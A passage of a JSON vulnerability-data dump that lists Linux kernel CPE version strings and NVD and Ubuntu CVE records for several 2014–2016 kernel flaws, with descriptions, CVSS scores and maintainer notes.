"cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.10.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.60:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.11.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.59:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.55:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.52:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.58:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.63:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.67:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.46:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.50:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.62:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.10.0:*:*:*:*:*:arm64:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.53:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.57:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.68:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-01T10:04:18", "description": "Use-after-free vulnerability in the skb_segment function in net/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers to obtain sensitive information from kernel memory by leveraging the absence of a certain orphaning operation.", "cvss3": {}, "published": "2014-03-24T16:40:00", "type": "cve", "title": "CVE-2014-0131", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.9, "vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0131"], "modified": "2023-02-13T00:32:00", "cpe": ["cpe:/o:opensuse:evergreen:11.4", "cpe:/o:linux:linux_kernel:3.13.6", "cpe:/o:suse:linux_enterprise_server:11"], "id": "CVE-2014-0131", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0131", "cvss": {"score": 2.9, "vector": "AV:A/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.13.6:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:evergreen:11.4:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp2:*:*:ltss:*:*:*"]}], "ubuntucve": [{"lastseen": "2023-06-01T14:00:44", "description": "A missing authorization check in the fscrypt_process_policy function in\nfs/crypto/policy.c in the ext4 and f2fs filesystem encryption support in\nthe Linux kernel before 4.7.4 allows a user to assign an encryption policy\nto a directory owned by a different user, potentially creating a denial of\nservice.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-04-04T00:00:00", "type": "ubuntucve", "title": "CVE-2016-10318", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10318"], "modified": "2017-04-04T00:00:00", "id": "UB:CVE-2016-10318", "href": "https://ubuntu.com/security/CVE-2016-10318", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-01T14:06:07", "description": "The vfe31_proc_general function in drivers/media/video/msm/vfe/msm_vfe31.c\nin the MSM-VFE31 driver for the Linux kernel 3.x, as used in Qualcomm\nInnovation Center (QuIC) Android contributions for MSM devices and other\nproducts, does not validate a certain id value, which allows attackers to\ngain privileges or cause a denial of service (memory corruption) via an\napplication that makes a crafted ioctl call.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-08-07T00:00:00", "type": "ubuntucve", "title": "CVE-2014-9410", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9410"], "modified": "2016-08-07T00:00:00", "id": "UB:CVE-2014-9410", "href": "https://ubuntu.com/security/CVE-2014-9410", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T13:59:49", "description": "The regulator_ena_gpio_free function in drivers/regulator/core.c in the\nLinux kernel before 3.19 allows local users to gain privileges or cause a\ndenial of service (use-after-free) via a crafted application.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-02T00:00:00", "type": "ubuntucve", "title": "CVE-2014-9940", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9940"], "modified": "2017-05-02T00:00:00", "id": "UB:CVE-2014-9940", "href": "https://ubuntu.com/security/CVE-2014-9940", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T13:56:05", "description": "Out-of-bounds memory read in the x509_decode_time function in\nx509_cert_parser.c in Linux kernels 4.3-rc1 and after.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1516750>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | While fd19a3d195be23e8d9d0d66576b96ea25eea8323 looks like the actual introduction of this issue, the code before this point didn't appear to do any date validation; perhaps the 'break' point ought to be the introduction of the crypto/asymmetric_keys/x509_cert_parser.c file instead. \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-09-25T00:00:00", "type": "ubuntucve", "title": "CVE-2015-5327", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5327"], "modified": "2017-09-25T00:00:00", "id": "UB:CVE-2015-5327", "href": "https://ubuntu.com/security/CVE-2015-5327", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-06-01T14:07:49", "description": "Use-after-free vulnerability in mm/percpu.c in the Linux kernel through 4.6\nallows local users to cause a denial of service (BUG) or possibly have\nunspecified other impact via crafted use of the mmap and bpf system calls.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1581871>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-4794", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4794"], "modified": "2016-05-23T00:00:00", "id": "UB:CVE-2016-4794", "href": "https://ubuntu.com/security/CVE-2016-4794", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-01T14:14:53", "description": "The batadv_frag_merge_packets function in net/batman-adv/fragmentation.c in\nthe B.A.T.M.A.N. implementation in the Linux kernel through 3.18.1 uses an\nincorrect length field during a calculation of an amount of memory, which\nallows remote attackers to cause a denial of service (mesh-node system\ncrash) via fragmented packets.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774155>\n * <https://launchpad.net/bugs/1407952>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.04 preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {}, "published": "2015-01-02T00:00:00", "type": "ubuntucve", "title": "CVE-2014-9428", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9428"], "modified": "2015-01-02T00:00:00", "id": "UB:CVE-2014-9428", "href": "https://ubuntu.com/security/CVE-2014-9428", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-01T14:15:21", "description": "The paravirt_ops_setup function in arch/x86/kernel/kvm.c in the Linux\nkernel through 3.18 uses an improper paravirt_enabled setting for KVM guest\nkernels, which makes it easier for guest OS users to bypass the ASLR\nprotection mechanism via a crafted application that reads a 16-bit value.\n\n#### Bugs\n\n * 